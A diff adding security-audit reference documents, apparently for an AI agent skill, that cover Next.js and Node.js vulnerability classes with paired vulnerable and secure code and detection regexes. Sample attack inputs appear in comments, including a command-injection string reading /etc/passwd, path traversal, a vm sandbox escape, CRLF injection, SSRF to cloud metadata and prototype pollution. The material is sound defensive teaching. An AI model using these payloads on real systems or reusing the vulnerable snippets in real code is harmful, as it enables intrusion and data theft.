+    const allowedHosts = ['images.mycdn.com', 'avatars.githubusercontent.com'];
+    return parsed.protocol === 'https:' && allowedHosts.includes(parsed.hostname);
+  } catch {
+    return false;
+  }
+}
+```
+
+**Detection regex:** `hostname:\s*['"]?\*{1,2}['"]?`
+**Severity:** error
+
+---
+
+## Request Handling
+
+### SA-NEXT-06: Open Redirect via Rewrites/Redirects
+
+Next.js `rewrites` and `redirects` in `next.config.js` can create open redirect vulnerabilities when destination URLs include user-controlled path segments without validation.
+
+```typescript
+// VULNERABLE: User-controlled redirect destination
+// next.config.js
+module.exports = {
+  async redirects() {
+    return [
+      {
+        source: '/goto/:url*',
+        destination: '/:url*', // open redirect to any path
+        permanent: false,
+      },
+    ];
+  },
+};
+
+// VULNERABLE: Open redirect in API route
+// app/api/redirect/route.ts
+export async function GET(request: Request) {
+  const { searchParams } = new URL(request.url);
+  const target = searchParams.get('url');
+  return Response.redirect(target!); // redirects to any URL
+}
+
+// VULNERABLE: Client-side redirect without validation
+'use client';
+import { useSearchParams, useRouter } from 'next/navigation';
+
+function LoginCallback() {
+  const router = useRouter();
+  const searchParams = useSearchParams();
+
+  useEffect(() => {
+    const returnUrl = searchParams.get('returnUrl');
+    router.push(returnUrl || '/'); // attacker: ?returnUrl=https://evil.com
+  }, []);
+}
+```
+
+```typescript
+// SECURE: Validate redirect destinations
+// app/api/redirect/route.ts
+const ALLOWED_HOSTS = ['myapp.com', 'docs.myapp.com'];
+
+export async function GET(request: Request) {
+  const { searchParams } = new URL(request.url);
+  const target = searchParams.get('url') || '/';
+
+  try {
+    const parsed = new URL(target, 'https://myapp.com');
+    if (!ALLOWED_HOSTS.includes(parsed.hostname)) {
+      return Response.redirect(new URL('/', request.url));
+    }
+    return Response.redirect(parsed.toString());
+  } catch {
+    return Response.redirect(new URL('/', request.url));
+  }
+}
+
+// SECURE: Only allow relative paths for client redirects
+function LoginCallback() {
+  const router = useRouter();
+  const searchParams = useSearchParams();
+
+  useEffect(() => {
+    const returnUrl = searchParams.get('returnUrl') || '/';
+    // Only allow relative paths starting with /
+    if (returnUrl.startsWith('/') && !returnUrl.startsWith('//')) {
+      router.push(returnUrl);
+    } else {
+      router.push('/');
+    }
+  }, []);
+}
+
+// SECURE: Static redirects in next.config.js
+module.exports = {
+  async redirects() {
+    return [
+      {
+        source: '/old-blog/:slug',
+        destination: '/blog/:slug',
+        permanent: true,
+      },
+    ];
+  },
+};
+```
+
+**Detection regex:** `Response\.redirect\s*\([^)]*searchParams|redirect\s*\(\s*(?:req|request)`
+**Severity:** warning
+
+---
+
+### SA-NEXT-07: Server Component Data Serialization Leaks
+
+When Server Components render, their output is serialized as an RSC payload sent to the client. If a server component accidentally includes sensitive data in its render output (even in comments or hidden elements), it becomes visible in the network response.
+
+```typescript
+// VULNERABLE: Sensitive data in server component output
+// app/admin/page.tsx (server component)
+export default async function AdminPage() {
+  const config = await getServerConfig();
+  // config includes: dbConnectionString, apiKeys, internalEndpoints
+  return (
+    <div>
+      {/* Debug: {JSON.stringify(config)} */}
+      <AdminDashboard />
+    </div>
+  );
+}
+
+// VULNERABLE: Hidden div with sensitive data
+export default async function Page() {
+  const user = await getCurrentUser();
+  return (
+    <>
+      <div style={{ display: 'none' }} data-user={JSON.stringify(user)} />
+      <PublicProfile name={user.name} />
+    </>
+  );
+}
+
+// VULNERABLE: Console.log in server component (logged but also serialized in dev)
+export default async function Page() {
+  const secrets = await getSecrets();
+  console.log('Secrets:', secrets); // visible in server logs
+  return <Dashboard />;
+}
+```
+
+```typescript
+// SECURE: Only render non-sensitive data
+export default async function AdminPage() {
+  const session = await auth();
+  if (!session || session.user.role !== 'admin') {
+    redirect('/login');
+  }
+  return <AdminDashboard />;
+}
+
+// SECURE: Pass only safe props to client components
+export default async function Page() {
+  const user = await getCurrentUser();
+  return <PublicProfile name={user.name} avatarUrl={user.avatarUrl} />;
+}
+
+// SECURE: Use server-only package to prevent accidental client import
+import 'server-only';
+
+export async function getSecrets() {
+  return {
+    dbUrl: process.env.DATABASE_URL,
+    apiKey: process.env.API_KEY,
+  };
+}
+```
+
+**Detection regex:** `JSON\.stringify\s*\([^)]*(config|secret|user|session|token|key|credential)`
+**Severity:** warning
+
+---
+
+## CSRF & Caching
+
+### SA-NEXT-08: Missing CSRF Protection on Mutation Endpoints
+
+Next.js API routes that handle mutations (POST, PUT, DELETE) without CSRF protection are vulnerable to cross-site request forgery when using cookie-based authentication.
+
+```typescript
+// VULNERABLE: POST endpoint with cookie auth but no CSRF token
+// app/api/transfer/route.ts
+export async function POST(request: Request) {
+  const session = await auth(); // reads auth cookie
+  if (!session) return NextResponse.json({ error: 'Unauthorized' }, { status: 401 });
+
+  const { amount, toAccount } = await request.json();
+  await transferFunds(session.user.id, toAccount, amount);
+  return NextResponse.json({ success: true });
+}
+
+// VULNERABLE: Form submission without CSRF token
+// app/settings/page.tsx
+export default function SettingsPage() {
+  return (
+    <form action="/api/settings" method="POST">
+      <input name="email" type="email" />
+      <button type="submit">Save</button>
+    </form>
+  );
+}
+```
+
+```typescript
+// SECURE: Use Server Actions (have built-in CSRF protection)
+'use server';
+
+import { auth } from '@/lib/auth';
+
+export async function transferFunds(formData: FormData) {
+  const session = await auth();
+  if (!session) throw new Error('Unauthorized');
+
+  const amount = Number(formData.get('amount'));
+  const toAccount = formData.get('toAccount') as string;
+  await processTransfer(session.user.id, toAccount, amount);
+  revalidatePath('/dashboard');
+}
+
+// SECURE: CSRF token validation for API routes
+// app/api/transfer/route.ts
+import { validateCsrfToken } from '@/lib/csrf';
+
+export async function POST(request: Request) {
+  const csrfToken = request.headers.get('x-csrf-token');
+  if (!validateCsrfToken(csrfToken)) {
+    return NextResponse.json({ error: 'Invalid CSRF token' }, { status: 403 });
+  }
+
+  const session = await auth();
+  if (!session) return NextResponse.json({ error: 'Unauthorized' }, { status: 401 });
+
+  const { amount, toAccount } = await request.json();
+  await transferFunds(session.user.id, toAccount, amount);
+  return NextResponse.json({ success: true });
+}
+
+// SECURE: Use SameSite cookies + custom header check
+// middleware.ts
+export function middleware(request: NextRequest) {
+  if (['POST', 'PUT', 'DELETE'].includes(request.method)) {
+    const origin = request.headers.get('origin');
+    const host = request.headers.get('host');
+    if (origin && !origin.endsWith(host!)) {
+      return NextResponse.json({ error: 'CSRF' }, { status: 403 });
+    }
+  }
+  return NextResponse.next();
+}
+```
+
+**Detection regex:** `export\s+async\s+function\s+POST\s*\([^)]*\)\s*\{[^}]*(?:cookie|session|auth)`
+**Severity:** warning
+
+---
+
+### SA-NEXT-09: headers()/cookies() Misuse in Cached Routes
+
+Using `headers()` or `cookies()` in statically cached routes creates a false sense of security. If a page is cached (ISR/SSG), the cached response is served to all users regardless of their cookies or headers, potentially exposing one user's data to another.
+
+```typescript
+// VULNERABLE: Using cookies in a cached page
+// app/dashboard/page.tsx
+export const revalidate = 3600; // cached for 1 hour
+
+export default async function Dashboard() {
+  const cookieStore = await cookies();
+  const userId = cookieStore.get('userId')?.value;
+  const data = await getUserData(userId);
+  // First user's data is cached and served to ALL users for 1 hour!
+  return <DashboardView data={data} />;
+}
+
+// VULNERABLE: generateStaticParams + user-specific data
+export async function generateStaticParams() {
+  return [{ slug: 'dashboard' }];
+}
+
+export default async function Page() {
+  const headersList = await headers();
+  const authToken = headersList.get('authorization');
+  // Static page ignores auth token after first build
+  const data = await fetchProtectedData(authToken);
+  return <div>{data}</div>;
+}
+```
+
+```typescript
+// SECURE: Dynamic rendering for user-specific pages
+// app/dashboard/page.tsx
+export const dynamic = 'force-dynamic'; // never cache this page
+
+export default async function Dashboard() {
+  const cookieStore = await cookies();
+  const userId = cookieStore.get('userId')?.value;
+  if (!userId) redirect('/login');
+
+  const data = await getUserData(userId);
+  return <DashboardView data={data} />;
+}
+
+// SECURE: Use generateMetadata to opt into dynamic rendering
+export async function generateMetadata() {
+  const session = await auth(); // makes page dynamic
+  return { title: `${session?.user.name}'s Dashboard` };
+}
+
+// SECURE: Cache public data, fetch private data client-side
+export default async function Page() {
+  const publicData = await getPublicStats(); // safe to cache
+  return (
+    <>
+      <PublicStats data={publicData} />
+      <Suspense fallback={<Spinner />}>
+        <PrivateSection /> {/* fetches user data dynamically */}
+      </Suspense>
+    </>
+  );
+}
+```
+
+**Detection regex:** `revalidate\s*=\s*\d+[\s\S]*?(cookies|headers)\s*\(`
+**Severity:** error
+
+---
+
+## Remediation Priority
+
+| Finding | Severity | Remediation Timeline | Effort |
+|---------|----------|---------------------|--------|
+| SA-NEXT-01: Server Action auth bypass | Critical | Immediate | Medium |
+| SA-NEXT-02: API route auth bypass | Critical | Immediate | Medium |
+| SA-NEXT-03: NEXT_PUBLIC_ secret leakage | Critical | Immediate | Low |
+| SA-NEXT-04: Server data over-exposure | High | 1 week | Medium |
+| SA-NEXT-05: Image optimization SSRF | High | 1 week | Low |
+| SA-NEXT-06: Open redirect via rewrites | Medium | 1 week | Low |
+| SA-NEXT-07: Serialization data leaks | Medium | 1 month | Medium |
+| SA-NEXT-08: Missing CSRF on mutations | High | 1 week | Medium |
+| SA-NEXT-09: Cached route data leaks | Critical | Immediate | Medium |
+
+## Related References
+
+- `owasp-top10.md` — OWASP Top 10 mapping
+- `react-security.md` — React-specific patterns (underlying framework)
+- `javascript-typescript-security-features.md` — Language-level patterns
+- `frontend-security.md` — General frontend security patterns
+- `api-security.md` — API security patterns
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 8 |

--- a/skills/security-audit/references/nodejs-security-features.md
+++ b/skills/security-audit/references/nodejs-security-features.md
@@ -1,0 +1,792 @@
+# Node.js Security Features by Version
+
+Modern Node.js versions introduce runtime features, APIs, and permission controls that directly improve security when used correctly. This reference documents security-relevant patterns and features from Node.js 16 through 22+, focusing on server-side vulnerability classes unique to the Node.js execution model.
+
+## Core Node.js Security Patterns
+
+These patterns apply across all supported Node.js versions and represent the most common vulnerability classes in server-side JavaScript.
+
+### 1. Command Injection via `child_process.exec`
+
+`child_process.exec` spawns a shell and passes the command string to it, making it vulnerable to shell metacharacter injection when user input is interpolated into the command string.
+
+```javascript
+// VULNERABLE: String concatenation passes user input through a shell
+const { exec } = require('child_process');
+
+app.get('/lookup', (req, res) => {
+  const host = req.query.host;
+  exec('nslookup ' + host, (err, stdout) => {
+    res.send(stdout);
+  });
+});
+// Attacker sends: host=example.com;cat /etc/passwd
+
+// VULNERABLE: Template literals are equally dangerous
+exec(`convert ${req.body.filename} output.png`);
+
+// SECURE: execFile does not spawn a shell — arguments are passed as an array
+const { execFile } = require('child_process');
+
+app.get('/lookup', (req, res) => {
+  const host = req.query.host;
+  execFile('nslookup', [host], (err, stdout) => {
+    res.send(stdout);
+  });
+});
+
+// SECURE: spawn with explicit argument array
+const { spawn } = require('child_process');
+const proc = spawn('convert', [req.body.filename, 'output.png']);
+```
+
+**Security implication:** Shell injection (CWE-78) allows arbitrary command execution on the server. `exec` and `execSync` invoke `/bin/sh -c`, so semicolons, pipes, backticks, and `$()` are all interpreted. Always use `execFile`, `execFileSync`, or `spawn` with argument arrays, which bypass the shell entirely.
+
+**Detection regex:** `child_process.*exec\(`
+
+---
+
+### 2. Path Traversal via `fs` Operations
+
+When user-supplied input is passed to `fs` methods without validation, attackers can read or write files outside the intended directory using `../` sequences. `path.join` does not prevent traversal — it resolves `..` segments normally.
+
+```javascript
+// VULNERABLE: path.join resolves .. segments — does NOT prevent traversal
+const path = require('path');
+const fs = require('fs');
+
+app.get('/file', (req, res) => {
+  const filePath = path.join('/app/uploads', req.query.name);
+  // req.query.name = "../../etc/passwd" → filePath = "/etc/passwd"
+  fs.readFile(filePath, (err, data) => {
+    res.send(data);
+  });
+});
+
+// VULNERABLE: fs.readFile with direct user input
+fs.readFile(req.params.path, 'utf8', callback);
+
+// SECURE: Resolve and verify the path stays within the allowed directory
+const UPLOAD_DIR = path.resolve('/app/uploads');
+
+app.get('/file', (req, res) => {
+  const requested = path.resolve(UPLOAD_DIR, req.query.name);
+  if (!requested.startsWith(UPLOAD_DIR + path.sep)) {
+    return res.status(403).send('Forbidden');
+  }
+  fs.readFile(requested, (err, data) => {
+    res.send(data);
+  });
+});
+
+// SECURE (Node.js 20+): Use the Permission Model to restrict fs access
+// Start with: node --experimental-permission --allow-fs-read=/app/uploads
+```
+
+**Security implication:** Path traversal (CWE-22) allows reading sensitive files like `/etc/passwd`, `.env`, or application source code. Always resolve the full path with `path.resolve` and verify it starts with the intended base directory using `startsWith`.
+
+**Detection regex:** `fs\.(readFile|writeFile|readdir|unlink|access|stat|createReadStream|createWriteStream)\s*\(`
+
+---
+
+### 3. `vm` / `vm2` Sandbox Escape
+
+The Node.js `vm` module is explicitly documented as **not a security mechanism**. Code running in a `vm.Script` or `vm.createContext` can escape the sandbox and access the host process. The third-party `vm2` library was deprecated after multiple CVEs demonstrating sandbox escapes.
+
+```javascript
+// VULNERABLE: vm module is NOT a security boundary
+const vm = require('vm');
+
+app.post('/eval', (req, res) => {
+  const sandbox = { result: null };
+  vm.createContext(sandbox);
+  vm.runInContext(req.body.code, sandbox);
+  res.json({ result: sandbox.result });
+});
+// Attacker escapes with:
+// this.constructor.constructor('return process')().exit()
+
+// VULNERABLE: vm2 has known sandbox escapes (CVE-2023-37466, CVE-2023-32314)
+const { VM } = require('vm2');
+const vm2 = new VM();
+vm2.run(userCode); // Still escapable
+
+// SECURE: Use a separate process with limited permissions
+const { execFile } = require('child_process');
+
+app.post('/eval', (req, res) => {
+  // Run in isolated process with timeout and resource limits
+  execFile('node', ['--max-old-space-size=64', 'sandbox-worker.js'],
+    { timeout: 5000, cwd: '/app/sandbox', uid: 65534 },
+    (err, stdout) => {
+      res.json({ result: stdout });
+    }
+  );
+});
+
+// SECURE: Use worker_threads with transferable-only communication
+const { Worker } = require('worker_threads');
+const worker = new Worker('./sandbox-worker.js', {
+  workerData: { code: userCode },
+  resourceLimits: { maxOldGenerationSizeMb: 64, maxYoungGenerationSizeMb: 16 }
+});
+```
+
+**Security implication:** Sandbox escape (CWE-265) leads to full remote code execution. The `vm` module provides execution context isolation but not security isolation. For untrusted code, use OS-level isolation (containers, separate processes with `uid`/`chroot`, or dedicated sandboxing services).
+
+**Detection regex:** `require\s*\(\s*['"]vm2?['"]\s*\)`
+
+---
+
+### 4. `Buffer` Misuse
+
+`Buffer.allocUnsafe` returns uninitialized memory that may contain sensitive data from previous allocations. `Buffer(number)` (deprecated constructor) also returns uninitialized memory in older Node.js versions.
+
+```javascript
+// VULNERABLE: allocUnsafe exposes uninitialized heap memory
+const buf = Buffer.allocUnsafe(1024);
+// buf may contain fragments of previous strings, keys, passwords
+res.send(buf); // Leaks memory contents to client
+
+// VULNERABLE: Deprecated Buffer constructor with number argument
+const buf = new Buffer(userSize); // Uninitialized in Node < 10
+res.send(buf);
+
+// VULNERABLE: Buffer.from without encoding can misinterpret input
+const decoded = Buffer.from(userInput); // Assumes UTF-8; no validation
+
+// SECURE: Use Buffer.alloc which zero-fills memory
+const buf = Buffer.alloc(1024);
+
+// SECURE: Explicit encoding for Buffer.from
+const decoded = Buffer.from(userInput, 'base64');
+
+// SECURE: Validate buffer sizes to prevent DoS
+const MAX_SIZE = 1024 * 1024; // 1MB
+const size = parseInt(req.query.size, 10);
+if (isNaN(size) || size < 0 || size > MAX_SIZE) {
+  return res.status(400).send('Invalid size');
+}
+const buf = Buffer.alloc(size);
+```
+
+**Security implication:** Information disclosure (CWE-200) through uninitialized memory. `Buffer.allocUnsafe` is a performance optimization that should only be used when the buffer will be completely overwritten before being read. Never send an `allocUnsafe` buffer directly to a client.
+
+**Detection regex:** `Buffer\.(allocUnsafe|allocUnsafeSlow)\s*\(`
+
+---
+
+### 5. Dynamic `require()` with User Input
+
+When `require()` receives a path derived from user input, attackers can load arbitrary modules from the filesystem, potentially including files they have uploaded or symlinked.
+
+```javascript
+// VULNERABLE: Dynamic require with user-controlled path
+app.get('/plugin/:name', (req, res) => {
+  const plugin = require('./plugins/' + req.params.name);
+  plugin.run(res);
+});
+// Attacker sends: name=../../../etc/passwd (error leaks path info)
+// Or: name=../node_modules/child_process (loads built-in)
+
+// VULNERABLE: require with template literal
+const mod = require(`./handlers/${req.query.handler}`);
+
+// SECURE: Allowlist of permitted modules
+const ALLOWED_PLUGINS = {
+  'markdown': './plugins/markdown',
+  'csv': './plugins/csv',
+  'json': './plugins/json',
+};
+
+app.get('/plugin/:name', (req, res) => {
+  const pluginPath = ALLOWED_PLUGINS[req.params.name];
+  if (!pluginPath) {
+    return res.status(404).send('Plugin not found');
+  }
+  const plugin = require(pluginPath);
+  plugin.run(res);
+});
+```
+
+**Security implication:** Arbitrary code execution (CWE-94) through module loading. Dynamic `require` can load any `.js`, `.json`, or `.node` file on the filesystem. Always use an allowlist mapping from user input to safe module paths.
+
+**Detection regex:** `require\s*\(\s*[^'"]\s*[+\`]`
+
+---
+
+### 6. Event Loop Blocking
+
+CPU-bound synchronous operations in request handlers block the entire event loop, creating denial-of-service vulnerabilities. This includes synchronous crypto, large JSON parsing, and regular expression backtracking (ReDoS).
+
+```javascript
+// VULNERABLE: Synchronous bcrypt blocks event loop for ALL requests
+const bcrypt = require('bcryptjs');
+app.post('/login', (req, res) => {
+  const hash = bcrypt.hashSync(req.body.password, 12); // Blocks ~300ms
+  // All other requests are blocked during hashing
+});
+
+// VULNERABLE: ReDoS via evil regex with user input
+const userRegex = new RegExp(req.query.pattern);
+userRegex.test(someString); // Can hang for minutes with crafted input
+
+// VULNERABLE: JSON.parse on unbounded user input
+const data = JSON.parse(req.body); // 100MB JSON = frozen server
+
+// SECURE: Use async operations
+app.post('/login', async (req, res) => {
+  const hash = await bcrypt.hash(req.body.password, 12);
+  // Event loop stays responsive
+});
+
+// SECURE: Limit input size and use streaming JSON parsers
+app.use(express.json({ limit: '1mb' }));
+
+// SECURE: Avoid constructing RegExp from user input, or use safe-regex
+const safeRegex = require('safe-regex');
+if (!safeRegex(req.query.pattern)) {
+  return res.status(400).send('Invalid pattern');
+}
+```
+
+**Security implication:** Denial of service (CWE-400) via event loop blocking. A single slow synchronous operation prevents the server from handling any other requests. Use async APIs, limit input sizes, and never construct regular expressions from untrusted input.
+
+**Detection regex:** `(hashSync|compareSync|pbkdf2Sync|scryptSync|randomFillSync)\s*\(`
+
+---
+
+### 7. HTTP Header Injection (CRLF Injection)
+
+If user input is passed to `res.setHeader` or `res.writeHead` without sanitization, attackers can inject CRLF characters (`\r\n`) to add arbitrary headers or split the HTTP response.
+
+```javascript
+// VULNERABLE: User input directly in response header
+app.get('/redirect', (req, res) => {
+  res.setHeader('Location', req.query.url);
+  // Attacker: url=http://evil.com%0d%0aSet-Cookie:%20admin=true
+  res.status(302).end();
+});
+
+// VULNERABLE: User input in custom header
+res.setHeader('X-User-Name', req.query.name);
+
+// SECURE: Validate and sanitize header values
+app.get('/redirect', (req, res) => {
+  const url = req.query.url;
+  // Strip CR and LF characters
+  if (/[\r\n]/.test(url)) {
+    return res.status(400).send('Invalid URL');
+  }
+  // Validate it's a relative URL or from allowed origins
+  const parsed = new URL(url, 'https://myapp.com');
+  if (parsed.origin !== 'https://myapp.com') {
+    return res.status(400).send('Invalid redirect');
+  }
+  res.redirect(302, parsed.href);
+});
+
+// SECURE: Use a library that sanitizes headers automatically
+// Note: Node.js 18+ rejects headers containing \r or \n by default
+```
+
+**Security implication:** HTTP response splitting (CWE-113) allows attackers to inject headers, set cookies, or split responses to perform cache poisoning and XSS. Node.js 18+ includes built-in protection, but explicit validation is required for older versions and for defense in depth.
+
+**Detection regex:** `res\.(setHeader|writeHead)\s*\([^)]*req\.(query|params|body|headers)`
+
+---
+
+### 8. Stream Backpressure (Memory Exhaustion)
+
+When piping data from a fast source to a slow destination without respecting backpressure, the internal buffer grows unbounded, eventually exhausting server memory.
+
+```javascript
+// VULNERABLE: No backpressure handling — memory grows unbounded
+const http = require('http');
+const fs = require('fs');
+
+http.createServer((req, res) => {
+  if (req.method === 'POST') {
+    const writeStream = fs.createWriteStream('/tmp/upload.dat');
+    req.on('data', (chunk) => {
+      writeStream.write(chunk); // Ignoring return value!
+      // If disk is slow, chunks accumulate in memory
+    });
+  }
+});
+
+// SECURE: Use pipe() which handles backpressure automatically
+http.createServer((req, res) => {
+  if (req.method === 'POST') {
+    const writeStream = fs.createWriteStream('/tmp/upload.dat');
+    req.pipe(writeStream);
+    writeStream.on('finish', () => res.end('OK'));
+    writeStream.on('error', (err) => {
+      res.statusCode = 500;
+      res.end('Upload failed');
+    });
+  }
+});
+
+// SECURE: Use pipeline() from stream/promises for proper error handling
+const { pipeline } = require('stream/promises');
+const { createWriteStream } = require('fs');
+
+app.post('/upload', async (req, res) => {
+  try {
+    await pipeline(req, createWriteStream('/tmp/upload.dat'));
+    res.end('OK');
+  } catch (err) {
+    res.status(500).end('Upload failed');
+  }
+});
+```
+
+**Security implication:** Memory exhaustion denial of service (CWE-400). An attacker sending data faster than the server can write it to disk can crash the process. Always use `pipe()` or `pipeline()` which automatically pause the readable stream when the writable stream's buffer is full.
+
+**Detection regex:** `\.on\s*\(\s*['"]data['"]\s*,.*\.write\s*\(`
+
+---
+
+### 9. Insecure `http.createServer` Configuration
+
+Bare `http.createServer` without timeouts, size limits, or security headers leaves the server vulnerable to slowloris attacks, large payload DoS, and various HTTP-level exploits.
+
+```javascript
+// VULNERABLE: No timeouts, no size limits, no security headers
+const http = require('http');
+const server = http.createServer((req, res) => {
+  // Slowloris attack: client sends headers very slowly, holds connection
+  // Large body attack: client sends huge POST body, fills memory
+  let body = '';
+  req.on('data', chunk => { body += chunk; }); // Unbounded!
+  req.on('end', () => {
+    res.end('OK');
+  });
+});
+server.listen(3000);
+
+// SECURE: Configure timeouts and limits
+const server = http.createServer((req, res) => {
+  // Limit body size
+  let body = '';
+  let size = 0;
+  const MAX_BODY = 1024 * 1024; // 1MB
+
+  req.on('data', chunk => {
+    size += chunk.length;
+    if (size > MAX_BODY) {
+      res.writeHead(413);
+      res.end('Payload Too Large');
+      req.destroy();
+      return;
+    }
+    body += chunk;
+  });
+
+  // Set security headers
+  res.setHeader('X-Content-Type-Options', 'nosniff');
+  res.setHeader('X-Frame-Options', 'DENY');
+  res.setHeader('Strict-Transport-Security', 'max-age=31536000; includeSubDomains');
+
+  req.on('end', () => {
+    res.end('OK');
+  });
+});
+
+// Configure timeouts
+server.headersTimeout = 20000;    // 20s to receive headers
+server.requestTimeout = 30000;    // 30s total for request
+server.keepAliveTimeout = 5000;   // 5s keep-alive
+server.timeout = 60000;           // 60s total connection timeout
+server.maxHeadersCount = 50;      // Limit header count
+
+server.listen(3000);
+```
+
+**Security implication:** Denial of service (CWE-400) through resource exhaustion. Without timeouts, a slowloris attack can exhaust connection slots. Without body size limits, a single request can consume all available memory. Production servers should always set `headersTimeout`, `requestTimeout`, and body size limits.
+
+**Detection regex:** `http\.createServer\s*\(`
+
+---
+
+### 10. Prototype Pollution via `Object.assign` / Spread
+
+Prototype pollution occurs when an attacker can inject properties into `Object.prototype` through unvalidated object merging, affecting all objects in the application.
+
+```javascript
+// VULNERABLE: Deep merge of user-controlled objects
+function deepMerge(target, source) {
+  for (const key in source) {
+    if (typeof source[key] === 'object' && source[key] !== null) {
+      target[key] = target[key] || {};
+      deepMerge(target[key], source[key]);
+    } else {
+      target[key] = source[key];
+    }
+  }
+  return target;
+}
+
+// Attacker sends: {"__proto__": {"isAdmin": true}}
+deepMerge({}, JSON.parse(req.body));
+// Now: ({}).isAdmin === true — all objects are "admin"
+
+// VULNERABLE: Object.assign with user input into shared config
+Object.assign(config, req.body);
+
+// SECURE: Block prototype-polluting keys
+function safeMerge(target, source) {
+  for (const key of Object.keys(source)) {
+    if (key === '__proto__' || key === 'constructor' || key === 'prototype') {
+      continue; // Skip dangerous keys
+    }
+    if (typeof source[key] === 'object' && source[key] !== null && !Array.isArray(source[key])) {
+      target[key] = target[key] || {};
+      safeMerge(target[key], source[key]);
+    } else {
+      target[key] = source[key];
+    }
+  }
+  return target;
+}
+
+// SECURE: Use Object.create(null) for dictionary objects
+const config = Object.create(null); // No prototype chain
+
+// SECURE: Use Map instead of plain objects for user data
+const userSettings = new Map();
+userSettings.set(key, value);
+
+// SECURE: Freeze the prototype (defense in depth)
+Object.freeze(Object.prototype);
+```
+
+**Security implication:** Prototype pollution (CWE-1321) can lead to authorization bypass, denial of service, or remote code execution depending on how the polluted properties are used. Validate all keys before merging user-controlled objects, use `Object.create(null)` for dictionaries, and consider `Object.freeze(Object.prototype)` as defense in depth.
+
+**Detection regex:** `__proto__|Object\.assign\s*\([^,]+,\s*req\.(body|query|params)`
+
+---
+
+## Node.js 16+ Features
+
+### 11. `crypto.randomUUID()` for Secure Identifiers
+
+Node.js 16 introduced `crypto.randomUUID()` as a built-in way to generate cryptographically secure UUIDs without external dependencies.
+
+```javascript
+// VULNERABLE: Math.random is not cryptographically secure
+function generateToken() {
+  return Math.random().toString(36).substring(2);
+  // Predictable! Math.random uses xorshift128+ — output is recoverable
+}
+
+// VULNERABLE: Timestamp-based identifiers are guessable
+const sessionId = Date.now().toString(36);
+
+// VULNERABLE: uuid v1 is timestamp-based, not random
+const { v1: uuidv1 } = require('uuid');
+const token = uuidv1(); // Based on timestamp + MAC address
+
+// SECURE: crypto.randomUUID (Node.js 16+)
+const crypto = require('crypto');
+const sessionId = crypto.randomUUID();
+// Returns: "36b8f84d-df4e-4d49-b662-bcde71a8764f"
+
+// SECURE: crypto.randomBytes for arbitrary-length tokens
+const token = crypto.randomBytes(32).toString('hex');
+
+// SECURE: crypto.randomInt for bounded random integers (Node.js 14.10+)
+const otp = crypto.randomInt(100000, 999999); // 6-digit OTP
+```
+
+**Security implication:** Insecure randomness (CWE-330) in session tokens, CSRF tokens, or API keys allows attackers to predict and forge values. `Math.random()` is not cryptographically secure and its output can be reverse-engineered from a few observed values. Always use `crypto.randomUUID()`, `crypto.randomBytes()`, or `crypto.randomInt()` for security-sensitive values.
+
+**Detection regex:** `Math\.random\s*\(`
+
+---
+
+### 12. AbortController for Request Cancellation
+
+Node.js 16 stabilized `AbortController`, enabling safe request cancellation with proper resource cleanup. This prevents resource leaks from abandoned or timed-out operations.
+
+```javascript
+// VULNERABLE: No timeout on outgoing HTTP requests
+const https = require('https');
+app.get('/proxy', (req, res) => {
+  https.get(req.query.url, (proxyRes) => {
+    proxyRes.pipe(res);
+  });
+  // If upstream never responds, this connection hangs forever
+});
+
+// VULNERABLE: fetch without timeout (Node.js 18+)
+const data = await fetch(url); // Hangs indefinitely on slow servers
+
+// SECURE: AbortController with timeout (Node.js 16+)
+app.get('/proxy', async (req, res) => {
+  const controller = new AbortController();
+  const timeout = setTimeout(() => controller.abort(), 5000);
+
+  try {
+    const response = await fetch(req.query.url, {
+      signal: controller.signal,
+    });
+    const data = await response.text();
+    res.send(data);
+  } catch (err) {
+    if (err.name === 'AbortError') {
+      res.status(504).send('Upstream timeout');
+    } else {
+      res.status(502).send('Upstream error');
+    }
+  } finally {
+    clearTimeout(timeout);
+  }
+});
+
+// SECURE: AbortSignal.timeout() shorthand (Node.js 18+)
+const response = await fetch(url, {
+  signal: AbortSignal.timeout(5000),
+});
+```
+
+**Security implication:** Resource exhaustion (CWE-400) from connections that never close. Without timeouts and cancellation, a slow or malicious upstream can hold server resources indefinitely, eventually exhausting connection pools and memory. Always use `AbortController` or `AbortSignal.timeout()` for outgoing requests.
+
+**Detection regex:** `https?\.(get|request)\s*\([^)]*\)\s*(?!.*abort|.*timeout)`
+
+---
+
+## Node.js 18+ Features
+
+### 13. Built-in Test Runner Security
+
+Node.js 18 introduced a built-in test runner (`node:test`) that eliminates the dependency on external test frameworks for security-sensitive testing.
+
+```javascript
+// SECURE: Built-in test runner for security tests (no third-party deps)
+const { describe, it } = require('node:test');
+const assert = require('node:assert/strict');
+const { sanitizeInput, validatePath } = require('../src/security');
+
+describe('Input Sanitization', () => {
+  it('rejects path traversal attempts', () => {
+    assert.throws(() => validatePath('../../../etc/passwd'), {
+      message: /path traversal/i
+    });
+  });
+
+  it('strips null bytes from input', () => {
+    assert.strictEqual(
+      sanitizeInput('file.txt\x00.jpg'),
+      'file.txt.jpg'
+    );
+  });
+
+  it('rejects prototype pollution keys', () => {
+    const result = sanitizeInput('{"__proto__": {"admin": true}}');
+    assert.strictEqual(({}).admin, undefined);
+  });
+});
+```
+
+**Security implication:** Reducing test framework dependencies shrinks the supply chain attack surface. The built-in `node:test` module requires no `npm install`, avoiding potential dependency confusion or malicious package injection through test tooling.
+
+---
+
+### 14. Built-in `fetch` API (SSRF Considerations)
+
+Node.js 18 includes a built-in `fetch` implementation (based on `undici`). While this reduces the dependency on `node-fetch`, it introduces server-side request forgery (SSRF) risks if URLs come from user input.
+
+```javascript
+// VULNERABLE: Fetching user-supplied URLs without validation (SSRF)
+app.get('/preview', async (req, res) => {
+  const response = await fetch(req.query.url);
+  const html = await response.text();
+  res.send(html);
+});
+// Attacker sends: url=http://169.254.169.254/latest/meta-data/ (AWS metadata)
+// Attacker sends: url=http://localhost:6379/CONFIG%20SET%20dir%20/tmp (Redis)
+
+// VULNERABLE: DNS rebinding bypass — URL looks external but resolves to internal
+// First resolution: 1.2.3.4 (external), second resolution: 127.0.0.1 (internal)
+
+// SECURE: Validate and restrict URLs
+const { URL } = require('url');
+
+const BLOCKED_HOSTS = new Set(['localhost', '127.0.0.1', '0.0.0.0', '::1']);
+const BLOCKED_CIDRS = ['10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16', '169.254.0.0/16'];
+
+async function safeFetch(urlString) {
+  const url = new URL(urlString);
+
+  // Block internal hostnames
+  if (BLOCKED_HOSTS.has(url.hostname)) {
+    throw new Error('Internal hosts not allowed');
+  }
+
